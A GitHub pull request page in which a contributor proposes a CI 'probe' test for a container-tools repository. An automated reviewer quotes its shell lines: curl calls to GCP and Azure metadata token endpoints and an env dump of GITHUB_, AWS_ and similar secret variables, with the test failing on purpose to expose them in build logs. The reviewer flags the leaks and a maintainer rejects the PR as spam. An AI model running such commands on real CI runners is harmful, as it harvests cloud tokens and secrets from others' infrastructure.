security: add runner escalation probe test#2060
security: add runner escalation probe test#2060KarimTantawey wants to merge 1 commit intoGoogleContainerTools:mainfrom
Conversation
|
Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA). View this failed invocation of the CLA check for more information. For the most up to date status, view the checks section at the bottom of the pull request. |
![gemini-code-assist[bot]](https://avatars.githubusercontent.com/in/956858?s=60&v=4){kind=small}
There was a problem hiding this comment.
Code Review
This pull request introduces a security probe test suite designed to audit runner environments for persistence, metadata access, and credential exposure. The suite includes a shell script that probes various endpoints and environment variables, intentionally forcing a failure to ensure log visibility in CI. The review feedback identifies several critical security vulnerabilities where sensitive access tokens from GCP and Azure metadata endpoints, as well as full environment variable values, would be leaked into the build logs. Additionally, it is recommended to tag the Bazel test as 'manual' to prevent the intentional failure from disrupting standard CI pipelines.
| curl -sS -m 2 -H "Metadata-Flavor: Google" \ | ||
| "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token" || true |
There was a problem hiding this comment.
Dumping the response from the GCP token endpoint directly to the logs will expose the access_token in the CI output. Since this test is designed to fail (forcing log visibility), this creates a critical security risk where credentials can be harvested from the build logs.
| curl -sS -m 2 -H "Metadata-Flavor: Google" \ | |
| "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token" || true | |
| curl -sS -m 2 -o /dev/null -w "%{http_code}\n" -H "Metadata-Flavor: Google" \ | |
| "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token" || true |
| curl -sS -m 2 -H "Metadata:true" \ | ||
| "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" || true |
There was a problem hiding this comment.
Dumping the response from the Azure IMDS token endpoint will expose the access_token in the CI logs. This is a critical security vulnerability as it allows anyone with access to the logs to obtain a valid cloud identity token.
| curl -sS -m 2 -H "Metadata:true" \ | |
| "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" || true | |
| curl -sS -m 2 -o /dev/null -w "%{http_code}\n" -H "Metadata:true" \ | |
| "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" || true |
| echo "FOUND_CRED_PATH: $p" | ||
| fi | ||
| done | ||
| env | grep -E '^(ACTIONS_|GITHUB_|GOOGLE_|GCLOUD_|AWS_|AZURE_|DOCKER_|CRANE_|COSIGN_)' | sort || true |
There was a problem hiding this comment.
Printing the full values of environment variables with these prefixes is extremely dangerous, as they often contain sensitive secrets like GITHUB_TOKEN, AWS_SECRET_ACCESS_KEY, or ACTIONS_RUNTIME_TOKEN. These values will be visible in the CI logs.
| env | grep -E '^(ACTIONS_|GITHUB_|GOOGLE_|GCLOUD_|AWS_|AZURE_|DOCKER_|CRANE_|COSIGN_)' | sort || true | |
| env | grep -E '^(ACTIONS_|GITHUB_|GOOGLE_|GCLOUD_|AWS_|AZURE_|DOCKER_|CRANE_|COSIGN_)' | cut -d= -f1 | sort || true |
Add a PR-executable probe test to collect persistence, metadata, ambient credential, and cache-context evidence from CI runners.
|
This is not a project for you to spam your security tests |
2 participants
Add a PR-executable probe test to collect persistence, metadata, ambient credential, and cache-context evidence from CI runners.